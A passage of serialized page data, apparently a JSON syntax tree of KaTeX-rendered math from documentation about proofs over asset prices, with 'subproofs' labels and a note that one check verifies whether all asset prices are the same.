constraints.",{"type":27,"tag":36,"props":102369,"children":102370},{},[102371],{"type":27,"tag":12606,"props":102372,"children":102373},{},[102374],{"type":33,"value":100636},{"type":27,"tag":1228,"props":102376,"children":102377},{},[102378,102382,102387],{"type":27,"tag":1232,"props":102379,"children":102380},{},[102381],{"type":33,"value":100654},{"type":27,"tag":1232,"props":102383,"children":102384},{},[102385],{"type":33,"value":102386},"Asset prices",{"type":27,"tag":1232,"props":102388,"children":102389},{},[102390],{"type":33,"value":100649},{"type":27,"tag":36,"props":102392,"children":102393},{},[102394],{"type":27,"tag":12606,"props":102395,"children":102396},{},[102397],{"type":33,"value":100662},{"type":27,"tag":1228,"props":102399,"children":102400},{},[102401],{"type":27,"tag":1232,"props":102402,"children":102403},{},[102404],{"type":33,"value":102405},"8 subproofs",{"type":27,"tag":36,"props":102407,"children":102408},{},[102409],{"type":27,"tag":12606,"props":102410,"children":102411},{},[102412],{"type":33,"value":100683},{"type":27,"tag":1228,"props":102414,"children":102415},{},[102416,102826,103157,103524,103910],{"type":27,"tag":1232,"props":102417,"children":102418},{},[102419,102821,102822],{"type":27,"tag":84,"props":102420,"children":102422},{"className":102421},[11266,11267],[102423],{"type":27,"tag":207,"props":102424,"children":102426},{"className":102425},[11272],[102427],{"type":27,"tag":207,"props":102428,"children":102430},{"className":102429,"ariaHidden":11278},[11277],[102431,102567],{"type":27,"tag":207,"props":102432,"children":102434},{"className":102433},[11283],[102435,102439,102444,102449,102454,102459,102464,102469,102474,102479,102484,102489,102494,102499,102504,102509,102514,102519,102524,102529,102534,102539,102544,102549,102554,102558,102563],{"type":27,"tag":207,"props":102436,"children":102438},{"className":102437,"style":100206},[11288],[],{"type":27,"tag":207,"props":102440,"children":102442},{"className":102441},[11294,28860],[102443],{"type":33,"value":29002},{"type":27,"tag":207,"props":102445,"children":102447},{"className":102446},[11294,28860],[102448],{"type":33,"value":100234},{"type":27,"tag":207,"props":102450,"children":102452},{"className":102451},[11294,28860],[102453],{"type":33,"value":29002},{"type":27,"tag":207,"props":102455,"children":102457},{"className":102456},[11294,28860],[102458],{"type":33,"value":47},{"type":27,"tag":207,"props":102460,"children":102462},{"className":102461,"style":100276},[11294,28860],[102463],{"type":33,"value":100279},{"type":27,"tag":207,"props":102465,"children":102467},{"className":102466,"style":100264},[11294],[102468],{"type":33,"value":10371},{"type":27,"tag":207,"props":102470,"children":102472},{"className":102471},[11294,28860],[102473],{"type":33,"value":47},{"type":27,"tag":207,"props":102475,"children":102477},{"className":102476},[11294,28860],[102478],{"type":33,"value":100255},{"type":27,"tag":207,"props":102480,"children":102482},{"className":102481},[11294,28860],[102483],{"type":33,"value":29002},{"type":27,"tag":207,"props":102485,"children":102487},{"className":102486,"style":100264},[11294],[102488],{"type":33,"value":10371},{"type":27,"tag":207,"props":102490,"children":102492},{"className":102491},[11294,28860],[102493],{"type":33,"value":100272},{"type":27,"tag":207,"props":102495,"children":102497},{"className":102496,"style":100276},[11294,28860],[102498],{"type":33,"value":100279},{"type":27,"tag":207,"props":102500,"children":102502},{"className":102501},[11294,28860],[102503],{"type":33,"value":100285},{"type":27,"tag":207,"props":102505,"children":102507},{"className":102506},[11294,28860],[102508],{"type":33,"value":100291},{"type":27,"tag":207,"props":102510,"children":102512},{"className":102511},[28989],[102513],{"type":33,"value":11019},{"type":27,"tag":207,"props":102515,"children":102517},{"className":102516},[11294,28860],[102518],{"type":33,"value":47},{"type":27,"tag":207,"props":102520,"children":102522},{"className":102521},[11294,28860],[102523],{"type":33,"value":100255},{"type":27,"tag":207,"props":102525,"children":102527},{"className":102526},[11294,28860],[102528],{"type":33,"value":29002},{"type":27,"tag":207,"props":102530,"children":102532},{"className":102531,"style":100264},[11294],[102533],{"type":33,"value":10371},{"type":27,"tag":207,"props":102535,"children":102537},{"className":102536},[11294,28860],[102538],{"type":33,"value":63637},{"type":27,"tag":207,"props":102540,"children":102542},{"className":102541},[11294,28860],[102543],{"type":33,"value":100523},{"type":27,"tag":207,"props":102545,"children":102547},{"className":102546},[11294,28860],[102548],{"type":33,"value":58372},{"type":27,"tag":207,"props":102550,"children":102552},{"className":102551},[29011],[102553],{"type":33,"value":22686},{"type":27,"tag":207,"props":102555,"children":102557},{"className":102556,"style":11470},[11372],[],{"type":27,"tag":207,"props":102559,"children":102561},{"className":102560},[11475],[102562],{"type":33,"value":15856},{"type":27,"tag":207,"props":102564,"children":102566},{"className":102565,"style":11470},[11372],[],{"type":27,"tag":207,"props":102568,"children":102570},{"className":102569},[11283],[102571,102575,102580,102585,102590,102595,102600,102605,102611,102670,102675,102680,102685,102690,102695,102700,102705,102710,102716,102721,102726,102731,102736,102741,102746,102751,102756,102761,102766,102771,102776,102781,102786,102791,102796,102801,102806,102811,102816],{"type":27,"tag":207,"props":102572,"children":102574},{"className":102573,"style":100206},[11288],[],{"type":27,"tag":207,"props":102576,"children":102578},{"className":102577},[11294],[102579],{"type":33,"value":100854},{"type":27,"tag":207,"props":102581,"children":102583},{"className":102582},[11372],[102584],{"type":33,"value":28961},{"type":27,"tag":207,"props":102586,"children":102588},{"className":102587},[11294,28860],[102589],{"type":33,"value":17929},{"type":27,"tag":207,"props":102591,"children":102593},{"className":102592},[11294,28860],[102594],{"type":33,"value":100523},{"type":27,"tag":207,"props":102596,"children":102598},{"className":102597},[11294,28860],[102599],{"type":33,"value":10512},{"type":27,"tag":207,"props":102601,"children":102603},{"className":102602},[11294,28860],[102604],{"type":33,"value":36},{"type":27,"tag":207,"props":102606,"children":102608},{"className":102607},[11294,28860],[102609],{"type":33,"value":102610},"roo",{"type":27,"tag":207,"props":102612,"children":102614},{"className":102613},[11294],[102615,102621],{"type":27,"tag":207,"props":102616,"children":102619},{"className":102617,"style":102618},[11294,28860],"margin-right:0.10764em;",[102620],{"type":33,"value":7596},{"type":27,"tag":207,"props":102622,"children":102624},{"className":102623},[11309],[102625],{"type":27,"tag":207,"props":102626,"children":102628},{"className":102627},[11314,28914],[102629,102659],{"type":27,"tag":207,"props":102630,"children":102632},{"className":102631},[11319],[102633,102654],{"type":27,"tag":207,"props":102634,"children":102636},{"className":102635,"style":100793},[11324],[102637],{"type":27,"tag":207,"props":102638,"children":102640},{"style":102639},"top:-2.55em;margin-left:-0.1076em;margin-right:0.05em;",[102641,102645],{"type":27,"tag":207,"props":102642,"children":102644},{"className":102643,"style":11334},[11333],[],{"type":27,"tag":207,"props":102646,"children":102648},{"className":102647},[11339,11340,11341,11342],[102649],{"type":27,"tag":207,"props":102650,"children":102652},{"className":102651},[11294,28860,11342],[102653],{"type":33,"value":4690},{"type":27,"tag":207,"props":102655,"children":102657},{"className":102656},[29017],[102658],{"type":33,"value":29020},{"type":27,"tag":207,"props":102660,"children":102662},{"className":102661},[11319],[102663],{"type":27,"tag":207,"props":102664,"children":102666},{"className":102665,"style":100347},[11324],[102667],{"type":27,"tag":207,"props":102668,"children":102669},{},[],{"type":27,"tag":207,"props":102671,"children":102673},{"className":102672},[11294],[102674],{"type":33,"value":1041},{"type":27,"tag":207,"props":102676,"children":102678},{"className":102677},[11294,28860],[102679],{"type":33,"value":36},{"type":27,"tag":207,"props":102681,"children":102683},{"className":102682},[11294,28860],[102684],{"type":33,"value":100523},{"type":27,"tag":207,"props":102686,"children":102688},{"className":102687},[11294,28860],[102689],{"type":33,"value":10512},{"type":27,"tag":207,"props":102691,"children":102693},{"className":102692,"style":100276},[11294,28860],[102694],{"type":33,"value":100279},{"type":27,"tag":207,"props":102696,"children":102698},{"className":102697},[11294,28860],[102699],{"type":33,"value":4690},{"type":27,"tag":207,"props":102701,"children":102703},{"className":102702},[11294,28860],[102704],{"type":33,"value":10435},{"type":27,"tag":207,"props":102706,"children":102708},{"className":102707,"style":100264},[11294],[102709],{"type":33,"value":10371},{"type":27,"tag":207,"props":102711,"children":102713},{"className":102712},[11294,28860],[102714],{"type":33,"value":102715},"in",{"type":27,"tag":207,"props":102717,"children":102719},{"className":102718},[11294,28860],[102720],{"type":33,"value":36},{"type":27,"tag":207,"props":102722,"children":102724},{"className":102723},[11294,28860],[102725],{"type":33,"value":100523},{"type":27,"tag":207,"props":102727,"children":102729},{"className":102728},[11294,28860],[102730],{"type":33,"value":29002},{"type":27,"tag":207,"props":102732,"children":102734},{"className":102733},[11294],[102735],{"type":33,"value":1041},{"type":27,"tag":207,"props":102737,"children":102739},{"className":102738},[11294,28860],[102740],{"type":33,"value":47},{"type":27,"tag":207,"props":102742,"children":102744},{"className":102743},[11294,28860],[102745],{"type":33,"value":100255},{"type":27,"tag":207,"props":102747,"children":102749},{"className":102748},[11294,28860],[102750],{"type":33,"value":29002},{"type":27,"tag":207,"props":102752,"children":102754},{"className":102753,"style":100264},[11294],[102755],{"type":33,"value":10371},{"type":27,"tag":207,"props":102757,"children":102759},{"className":102758},[11294,28860],[102760],{"type":33,"value":100272},{"type":27,"tag":207,"props":102762,"children":102764},{"className":102763,"style":100276},[11294,28860],[102765],{"type":33,"value":100279},{"type":27,"tag":207,"props":102767,"children":102769},{"className":102768},[11294,28860],[102770],{"type":33,"value":100285},{"type":27,"tag":207,"props":102772,"children":102774},{"className":102773},[11294,28860],[102775],{"type":33,"value":101094},{"type":27,"tag":207,"props":102777,"children":102779},{"className":102778},[28989],[102780],{"type":33,"value":11019},{"type":27,"tag":207,"props":102782,"children":102784},{"className":102783},[11294,28860],[102785],{"type":33,"value":47},{"type":27,"tag":207,"props":102787,"children":102789},{"className":102788},[11294,28860],[102790],{"type":33,"value":100255},{"type":27,"tag":207,"props":102792,"children":102794},{"className":102793},[11294,28860],[102795],{"type":33,"value":29002},{"type":27,"tag":207,"props":102797,"children":102799},{"className":102798,"style":100264},[11294],[102800],{"type":33,"value":10371},{"type":27,"tag":207,"props":102802,"children":102804},{"className":102803},[11294,28860],[102805],{"type":33,"value":63637},{"type":27,"tag":207,"props":102807,"children":102809},{"className":102808},[11294,28860],[102810],{"type":33,"value":100523},{"type":27,"tag":207,"props":102812,"children":102814},{"className":102813},[11294,28860],[102815],{"type":33,"value":58372},{"type":27,"tag":207,"props":102817,"children":102819},{"className":102818},[29011],[102820],{"type":33,"value":22686},{"type":33,"value":13740},{"type":27,"tag":12606,"props":102823,"children":102824},{},[102825],{"type":33,"value":101654},{"type":27,"tag":1232,"props":102827,"children":102828},{},[102829],{"type":27,"tag":84,"props":102830,"children":102832},{"className":102831},[11266,11267],[102833],{"type":27,"tag":207,"props":102834,"children":102836},{"className":102835},[11272],[102837],{"type":27,"tag":207,"props":102838,"children":102840},{"className":102839,"ariaHidden":11278},[11277],[102841,102947],{"type":27,"tag":207,"props":102842,"children":102844},{"className":102843},[11283],[102845,102849,102854,102859,102864,102869,102874,102879,102884,102889,102894,102899,102904,102909,102914,102919,102924,102929,102934,102938,102943],{"type":27,"tag":207,"props":102846,"children":102848},{"className":102847,"style":100206},[11288],[],{"type":27,"tag":207,"props":102850,"children":102852},{"className":102851},[11294,28860],[102853],{"type":33,"value":47},{"type":27,"tag":207,"props":102855,"children":102857},{"className":102856},[11294,28860],[102858],{"type":33,"value":100255},{"type":27,"tag":207,"props":102860,"children":102862},{"className":102861},[11294,28860],[102863],{"type":33,"value":29002},{"type":27,"tag":207,"props":102865,"children":102867},{"className":102866,"style":100264},[11294],[102868],{"type":33,"value":10371},{"type":27,"tag":207,"props":102870,"children":102872},{"className":102871},[11294,28860],[102873],{"type":33,"value":36},{"type":27,"tag":207,"props":102875,"children":102877},{"className":102876,"style":100264},[11294,28860],[102878],{"type":33,"value":101083},{"type":27,"tag":207,"props":102880,"children":102882},{"className":102881},[11294,28860],[102883],{"type":33,"value":4690},{"type":27,"tag":207,"props":102885,"children":102887},{"className":102886},[11294,28860],[102888],{"type":33,"value":100291},{"type":27,"tag":207,"props":102890,"children":102892},{"className":102891},[28989],[102893],{"type":33,"value":11019},{"type":27,"tag":207,"props":102895,"children":102897},{"className":102896},[11294,28860],[102898],{"type":33,"value":47},{"type":27,"tag":207,"props":102900,"children":102902},{"className":102901},[11294,28860],[102903],{"type":33,"value":100255},{"type":27,"tag":207,"props":102905,"children":102907},{"className":102906},[11294,28860],[102908],{"type":33,"value":29002},{"type":27,"tag":207,"props":102910,"children":102912},{"className":102911,"style":100264},[11294],[102913],{"type":33,"value":10371},{"type":27,"tag":207,"props":102915,"children":102917},{"className":102916},[11294,28860],[102918],{"type":33,"value":63637},{"type":27,"tag":207,"props":102920,"children":102922},{"className":102921},[11294,28860],[102923],{"type":33,"value":100523},{"type":27,"tag":207,"props":102925,"children":102927},{"className":102926},[11294,28860],[102928],{"type":33,"value":58372},{"type":27,"tag":207,"props":102930,"children":102932},{"className":102931},[29011],[102933],{"type":33,"value":22686},{"type":27,"tag":207,"props":102935,"children":102937},{"className":102936,"style":11470},[11372],[],{"type":27,"tag":207,"props":102939,"children":102941},{"className":102940},[11475],[102942],{"type":33,"value":15856},{"type":27,"tag":207,"props":102944,"children":102946},{"className":102945,"style":11470},[11372],[],{"type":27,"tag":207,"props":102948,"children":102950},{"className":102949},[11283],[102951,102955,102960,102965,102970,102975,102980,103037,103042,103047,103052,103057,103062,103067,103072,103077,103082,103087,103092,103097,103102,103107,103112,103117,103122,103127,103132,103137,103142,103147,103152],{"type":27,"tag":207,"props":102952,"children":102954},{"className":102953,"style":100206},[11288],[],{"type":27,"tag":207,"props":102956,"children":102958},{"className":102957},[11294,28860],[102959],{"type":33,"value":17929},{"type":27,"tag":207,"props":102961,"children":102963},{"className":102962},[11294,28860],[102964],{"type":33,"value":100523},{"type":27,"tag":207,"props":102966,"children":102968},{"className":102967},[11294,28860],[102969],{"type":33,"value":10512},{"type":27,"tag":207,"props":102971,"children":102973},{"className":102972},[11294,28860],[102974],{"type":33,"value":36},{"type":27,"tag":207,"props":102976,"children":102978},{"className":102977},[11294,28860],[102979],{"type":33,"value":102610},{"type":27,"tag":207,"props":102981,"children":102983},{"className":102982},[11294],[102984,102989],{"type":27,"tag":207,"props":102985,"children":102987},{"className":102986,"style":102618},[11294,28860],[102988],{"type":33,"value":7596},{"type":27,"tag":207,"props":102990,"children":102992},{"className":102991},[11309],[102993],{"type":27,"tag":207,"props":102994,"children":102996},{"className":102995},[11314,28914],[102997,103026],{"type":27,"tag":207,"props":102998,"children":103000},{"className":102999},[11319],[103001,103021],{"type":27,"tag":207,"props":103002,"children":103004},{"className":103003,"style":100793},[11324],[103005],{"type":27,"tag":207,"props":103006,"children":103007},{"style":102639},[103008,103012],{"type":27,"tag":207,"props":103009,"children":103011},{"className":103010,"style":11334},[11333],[],{"type":27,"tag":207,"props":103013,"children":103015},{"className":103014},[11339,11340,11341,11342],[103016],{"type":27,"tag":207,"props":103017,"children":103019},{"className":103018},[11294,28860,11342],[103020],{"type":33,"value":4690},{"type":27,"tag":207,"props":103022,"children":103024},{"className":103023},[29017],[103025],{"type":33,"value":29020},{"type":27,"tag":207,"props":103027,"children":103029},{"className":103028},[11319],[103030],{"type":27,"tag":207,"props":103031,"children":103033},{"className":103032,"style":100347},[11324],[103034],{"type":27,"tag":207,"props":103035,"children":103036},{},[],{"type":27,"tag":207,"props":103038,"children":103040},{"className":103039},[11294],[103041],{"type":33,"value":1041},{"type":27,"tag":207,"props":103043,"children":103045},{"className":103044},[11294,28860],[103046],{"type":33,"value":36},{"type":27,"tag":207,"props":103048,"children":103050},{"className":103049},[11294,28860],[103051],{"type":33,"value":100523},{"type":27,"tag":207,"props":103053,"children":103055},{"className":103054},[11294,28860],[103056],{"type":33,"value":10512},{"type":27,"tag":207,"props":103058,"children":103060},{"className":103059,"style":100276},[11294,28860],[103061],{"type":33,"value":100279},{"type":27,"tag":207,"props":103063,"children":103065},{"className":103064},[11294,28860],[103066],{"type":33,"value":4690},{"type":27,"tag":207,"props":103068,"children":103070},{"className":103069},[11294,28860],[103071],{"type":33,"value":10435},{"type":27,"tag":207,"props":103073,"children":103075},{"className":103074,"style":100264},[11294],[103076],{"type":33,"value":10371},{"type":27,"tag":207,"props":103078,"children":103080},{"className":103079},[11294,28860],[103081],{"type":33,"value":102715},{"type":27,"tag":207,"props":103083,"children":103085},{"className":103084},[11294,28860],[103086],{"type":33,"value":36},{"type":27,"tag":207,"props":103088,"children":103090},{"className":103089},[11294,28860],[103091],{"type":33,"value":100523},{"type":27,"tag":207,"props":103093,"children":103095},{"className":103094},[11294,28860],[103096],{"type":33,"value":29002},{"type":27,"tag":207,"props":103098,"children":103100},{"className":103099},[11294],[103101],{"type":33,"value":1041},{"type":27,"tag":207,"props":103103,"children":103105},{"className":103104},[11294,28860],[103106],{"type":33,"value":47},{"type":27,"tag":207,"props":103108,"children":103110},{"className":103109},[11294,28860],[103111],{"type":33,"value":100255},{"type":27,"tag":207,"props":103113,"children":103115},{"className":103114},[11294,28860],[103116],{"type":33,"value":29002},{"type":27,"tag":207,"props":103118,"children":103120},{"className":103119,"style":100264},[11294],[103121],{"type":33,"value":10371},{"type":27,"tag":207,"props":103123,"children":103125},{"className":103124},[11294,28860],[103126],{"type":33,"value":36},{"type":27,"tag":207,"props":103128,"children":103130},{"className":103129,"style":100264},[11294,28860],[103131],{"type":33,"value":101083},{"type":27,"tag":207,"props":103133,"children":103135},{"className":103134},[11294,28860],[103136],{"type":33,"value":4690},{"type":27,"tag":207,"props":103138,"children":103140},{"className":103139},[11294,28860],[103141],{"type":33,"value":101094},{"type":27,"tag":207,"props":103143,"children":103145},{"className":103144},[28989],[103146],{"type":33,"value":11019},{"type":27,"tag":207,"props":103148,"children":103150},{"className":103149},[11294],[103151],{"type":33,"value":1660},{"type":27,"tag":207,"props":103153,"children":103155},{"className":103154},[29011],[103156],{"type":33,"value":22686},{"type":27,"tag":1232,"props":103158,"children":103159},{},[103160,103518,103519],{"type":27,"tag":84,"props":103161,"children":103163},{"className":103162},[11266,11267],[103164],{"type":27,"tag":207,"props":103165,"children":103167},{"className":103166},[11272],[103168],{"type":27,"tag":207,"props":103169,"children":103171},{"className":103170,"ariaHidden":11278},[11277],[103172,103278],{"type":27,"tag":207,"props":103173,"children":103175},{"className":103174},[11283],[103176,103180,103185,103190,103195,103200,103205,103210,103215,103220,103225,103230,103235,103240,103245,103250,103255,103260,103265,103269,103274],{"type":27,"tag":207,"props":103177,"children":103179},{"className":103178,"style":100206},[11288],[],{"type":27,"tag":207,"props":103181,"children":103183},{"className":103182},[11294,28860],[103184],{"type":33,"value":47},{"type":27,"tag":207,"props":103186,"children":103188},{"className":103187},[11294,28860],[103189],{"type":33,"value":100255},{"type":27,"tag":207,"props":103191,"children":103193},{"className":103192},[11294,28860],[103194],{"type":33,"value":29002},{"type":27,"tag":207,"props":103196,"children":103198},{"className":103197,"style":100264},[11294],[103199],{"type":33,"value":10371},{"type":27,"tag":207,"props":103201,"children":103203},{"className":103202},[11294,28860],[103204],{"type":33,"value":36},{"type":27,"tag":207,"props":103206,"children":103208},{"className":103207,"style":100264},[11294,28860],[103209],{"type":33,"value":101083},{"type":27,"tag":207,"props":103211,"children":103213},{"className":103212},[11294,28860],[103214],{"type":33,"value":4690},{"type":27,"tag":207,"props":103216,"children":103218},{"className":103217},[11294,28860],[103219],{"type":33,"value":100291},{"type":27,"tag":207,"props":103221,"children":103223},{"className":103222},[28989],[103224],{"type":33,"value":11019},{"type":27,"tag":207,"props":103226,"children":103228},{"className":103227},[11294,28860],[103229],{"type":33,"value":47},{"type":27,"tag":207,"props":103231,"children":103233},{"className":103232},[11294,28860],[103234],{"type":33,"value":100255},{"type":27,"tag":207,"props":103236,"children":103238},{"className":103237},[11294,28860],[103239],{"type":33,"value":29002},{"type":27,"tag":207,"props":103241,"children":103243},{"className":103242,"style":100264},[11294],[103244],{"type":33,"value":10371},{"type":27,"tag":207,"props":103246,"children":103248},{"className":103247},[11294,28860],[103249],{"type":33,"value":63637},{"type":27,"tag":207,"props":103251,"children":103253},{"className":103252},[11294,28860],[103254],{"type":33,"value":100523},{"type":27,"tag":207,"props":103256,"children":103258},{"className":103257},[11294,28860],[103259],{"type":33,"value":58372},{"type":27,"tag":207,"props":103261,"children":103263},{"className":103262},[29011],[103264],{"type":33,"value":22686},{"type":27,"tag":207,"props":103266,"children":103268},{"className":103267,"style":11470},[11372],[],{"type":27,"tag":207,"props":103270,"children":103272},{"className":103271},[11475],[103273],{"type":33,"value":15856},{"type":27,"tag":207,"props":103275,"children":103277},{"className":103276,"style":11470},[11372],[],{"type":27,"tag":207,"props":103279,"children":103281},{"className":103280},[11283],[103282,103286,103291,103296,103301,103306,103311,103368,103373,103378,103383,103388,103393,103398,103403,103408,103413,103418,103423,103428,103433,103438,103443,103448,103453,103458,103463,103468,103473,103478,103483,103488,103493,103498,103503,103508,103513],{"type":27,"tag":207,"props":103283,"children":103285},{"className":103284,"style":100206},[11288],[],{"type":27,"tag":207,"props":103287,"children":103289},{"className":103288},[11294,28860],[103290],{"type":33,"value":17929},{"type":27,"tag":207,"props":103292,"children":103294},{"className":103293},[11294,28860],[103295],{"type":33,"value":100523},{"type":27,"tag":207,"props":103297,"children":103299},{"className":103298},[11294,28860],[103300],{"type":33,"value":10512},{"type":27,"tag":207,"props":103302,"children":103304},{"className":103303},[11294,28860],[103305],{"type":33,"value":36},{"type":27,"tag":207,"props":103307,"children":103309},{"className":103308},[11294,28860],[103310],{"type":33,"value":102610},{"type":27,"tag":207,"props":103312,"children":103314},{"className":103313},[11294],[103315,103320],{"type":27,"tag":207,"props":103316,"children":103318},{"className":103317,"style":102618},[11294,28860],[103319],{"type":33,"value":7596},{"type":27,"tag":207,"props":103321,"children":103323},{"className":103322},[11309],[103324],{"type":27,"tag":207,"props":103325,"children":103327},{"className":103326},[11314,28914],[103328,103357],{"type":27,"tag":207,"props":103329,"children":103331},{"className":103330},[11319],[103332,103352],{"type":27,"tag":207,"props":103333,"children":103335},{"className":103334,"style":100793},[11324],[103336],{"type":27,"tag":207,"props":103337,"children":103338},{"style":102639},[103339,103343],{"type":27,"tag":207,"props":103340,"children":103342},{"className":103341,"style":11334},[11333],[],{"type":27,"tag":207,"props":103344,"children":103346},{"className":103345},[11339,11340,11341,11342],[103347],{"type":27,"tag":207,"props":103348,"children":103350},{"className":103349},[11294,28860,11342],[103351],{"type":33,"value":4690},{"type":27,"tag":207,"props":103353,"children":103355},{"className":103354},[29017],[103356],{"type":33,"value":29020},{"type":27,"tag":207,"props":103358,"children":103360},{"className":103359},[11319],[103361],{"type":27,"tag":207,"props":103362,"children":103364},{"className":103363,"style":100347},[11324],[103365],{"type":27,"tag":207,"props":103366,"children":103367},{},[],{"type":27,"tag":207,"props":103369,"children":103371},{"className":103370},[11294],[103372],{"type":33,"value":1041},{"type":27,"tag":207,"props":103374,"children":103376},{"className":103375},[11294,28860],[103377],{"type":33,"value":36},{"type":27,"tag":207,"props":103379,"children":103381},{"className":103380},[11294,28860],[103382],{"type":33,"value":100523},{"type":27,"tag":207,"props":103384,"children":103386},{"className":103385},[11294,28860],[103387],{"type":33,"value":10512},{"type":27,"tag":207,"props":103389,"children":103391},{"className":103390,"style":100276},[11294,28860],[103392],{"type":33,"value":100279},{"type":27,"tag":207,"props":103394,"children":103396},{"className":103395},[11294,28860],[103397],{"type":33,"value":4690},{"type":27,"tag":207,"props":103399,"children":103401},{"className":103400},[11294,28860],[103402],{"type":33,"value":10435},{"type":27,"tag":207,"props":103404,"children":103406},{"className":103405,"style":100264},[11294],[103407],{"type":33,"value":10371},{"type":27,"tag":207,"props":103409,"children":103411},{"className":103410},[11294,28860],[103412],{"type":33,"value":102715},{"type":27,"tag":207,"props":103414,"children":103416},{"className":103415},[11294,28860],[103417],{"type":33,"value":36},{"type":27,"tag":207,"props":103419,"children":103421},{"className":103420},[11294,28860],[103422],{"type":33,"value":100523},{"type":27,"tag":207,"props":103424,"children":103426},{"className":103425},[11294,28860],[103427],{"type":33,"value":29002},{"type":27,"tag":207,"props":103429,"children":103431},{"className":103430},[11294],[103432],{"type":33,"value":1041},{"type":27,"tag":207,"props":103434,"children":103436},{"className":103435},[11294,28860],[103437],{"type":33,"value":47},{"type":27,"tag":207,"props":103439,"children":103441},{"className":103440},[11294,28860],[103442],{"type":33,"value":100255},{"type":27,"tag":207,"props":103444,"children":103446},{"className":103445},[11294,28860],[103447],{"type":33,"value":29002},{"type":27,"tag":207,"props":103449,"children":103451},{"className":103450,"style":100264},[11294],[103452],{"type":33,"value":10371},{"type":27,"tag":207,"props":103454,"children":103456},{"className":103455},[11294,28860],[103457],{"type":33,"value":36},{"type":27,"tag":207,"props":103459,"children":103461},{"className":103460,"style":100264},[11294,28860],[103462],{"type":33,"value":101083},{"type":27,"tag":207,"props":103464,"children":103466},{"className":103465},[11294,28860],[103467],{"type":33,"value":4690},{"type":27,"tag":207,"props":103469,"children":103471},{"className":103470},[11294,28860],[103472],{"type":33,"value":101094},{"type":27,"tag":207,"props":103474,"children":103476},{"className":103475},[28989],[103477],{"type":33,"value":11019},{"type":27,"tag":207,"props":103479,"children":103481},{"className":103480},[11294,28860],[103482],{"type":33,"value":47},{"type":27,"tag":207,"props":103484,"children":103486},{"className":103485},[11294,28860],[103487],{"type":33,"value":100255},{"type":27,"tag":207,"props":103489,"children":103491},{"className":103490},[11294,28860],[103492],{"type":33,"value":29002},{"type":27,"tag":207,"props":103494,"children":103496},{"className":103495,"style":100264},[11294],[103497],{"type":33,"value":10371},{"type":27,"tag":207,"props":103499,"children":103501},{"className":103500},[11294,28860],[103502],{"type":33,"value":63637},{"type":27,"tag":207,"props":103504,"children":103506},{"className":103505},[11294,28860],[103507],{"type":33,"value":100523},{"type":27,"tag":207,"props":103509,"children":103511},{"className":103510},[11294,28860],[103512],{"type":33,"value":58372},{"type":27,"tag":207,"props":103514,"children":103516},{"className":103515},[29011],[103517],{"type":33,"value":22686},{"type":33,"value":13740},{"type":27,"tag":12606,"props":103520,"children":103521},{},[103522],{"type":33,"value":103523},"(verifies if all asset prices are the same)",{"type":27,"tag":1232,"props":103525,"children":103526},{},[103527,103905,103906],{"type":27,"tag":84,"props":103528,"children":103530},{"className":103529},[11266,11267],[103531],{"type":27,"tag":207,"props":103532,"children":103534},{"className":103533},[11272],[103535],{"type":27,"tag":207,"props":103536,"children":103538},{"className":103537,"ariaHidden":11278},[11277],[103539,103620],{"type":27,"tag":207,"props":103540,"children":103542},{"className":103541},[11283],[103543,103547,103552,103557,103562,103567,103572,103577,103582,103587,103592,103597,103602,103607,103611,103616],{"type":27,"tag":207,"props":103544,"children":103546},{"className":103545,"style":101677},[11288],[],{"type":27,"tag":207,"props":103548,"children":103550},{"className":103549},[11294,28860],[103551],{"type":33,"value":58372},{"type":27,"tag":207,"props":103553,"children":103555},{"className":103554,"style":100264},[11294,28860],[103556],{"type":33,"value":101689},{"type":27,"tag":207,"props":103558,"children":103560},{"className":103559,"style":101693},[11294,28860],[103561],{"type":33,"value":95904},{"type":27,"tag":207,"props":103563,"children":103565},{"className":103564,"style":100276},[11294,28860],[103566],{"type":33,"value":100279},{"type":27,"tag":207,"props":103568,"children":103570},{"className":103569},[11294,28860],[103571],{"type":33,"value":1419},{"type":27,"tag":207,"props":103573,"children":103575},{"className":103574,"style":100264},[11294],[103576],{"type":33,"value":10371},{"type":27,"tag":207,"props":103578,"children":103580},{"className":103579},[11294,28860],[103581],{"type":33,"value":29002},{"type":27,"tag":207,"props":103583,"children":103585},{"className":103584},[11294,28860],[103586],{"type":33,"value":101721},{"type":27,"tag":207,"props":103588,"children":103590},{"className":103589,"style":100264},[11294],[103591],{"type":33,"value":10371},{"type":27,"tag":207,"props":103593,"children":103595},{"className":103594},[11294,28860],[103596],{"type":33,"value":101732},{"type":27,"tag":207,"props":103598,"children":103600},{"className":103599},[11294,28860],[103601],{"type":33,"value":17929},{"type":27,"tag":207,"props":103603,"children":103605},{"className":103604},[11294,28860],[103606],{"type":33,"value":91568},{"type":27,"tag":207,"props":103608,"children":103610},{"className":103609,"style":11470},[11372],[],{"type":27,"tag":207,"props":103612,"children":103614},{"className":103613},[11475],[103615],{"type":33,"value":15856},{"type":27,"tag":207,"props":103617,"children":103619},{"className":103618,"style":11470},[11372],[],{"type":27,"tag":207,"props":103621,"children":103623},{"className":103622},[11283],[103624,103628,103633,103638,103643,103648,103653,103658,103663,103668,103673,103730,103735,103739,103744,103749,103806,103811,103815,103820,103825,103829,103834,103839,103900],{"type":27,"tag":207,"props":103625,"children":103627},{"className":103626,"style":11393},[11288],[],{"type":27,"tag":207,"props":103629,"children":103631},{"className":103630,"style":28861},[11294,28860],[103632],{"type":33,"value":28864},{"type":27,"tag":207,"props":103634,"children":103636},{"className":103635},[11294,28860],[103637],{"type":33,"value":100218},{"type":27,"tag":207,"props":103639,"children":103641},{"className":103640},[11294,28860],[103642],{"type":33,"value":4690},{"type":27,"tag":207,"props":103644,"children":103646},{"className":103645},[11294,28860],[103647],{"type":33,"value":77797},{"type":27,"tag":207,"props":103649,"children":103651},{"className":103650},[11294,28860],[103652],{"type":33,"value":100234},{"type":27,"tag":207,"props":103654,"children":103656},{"className":103655},[11294,28860],[103657],{"type":33,"value":63637},{"type":27,"tag":207,"props":103659,"children":103661},{"className":103660},[28989],[103662],{"type":33,"value":1343},{"type":27,"tag":207,"props":103664,"children":103666},{"className":103665},[11294,28860],[103667],{"type":33,"value":101732},{"type":27,"tag":207,"props":103669,"children":103671},{"className":103670},[11294,28860],[103672],{"type":33,"value":17929},{"type":27,"tag":207,"props":103674,"children":103676},{"className":103675},[11294],[103677,103682],{"type":27,"tag":207,"props":103678,"children":103680},{"className":103679},[11294,28860],[103681],{"type":33,"value":91568},{"type":27,"tag":207,"props":103683,"children":103685},{"className":103684},[11309],[103686],{"type":27,"tag":207,"props":103687,"children":103689},{"className":103688},[11314,28914],[103690,103719],{"type":27,"tag":207,"props":103691,"children":103693},{"className":103692},[11319]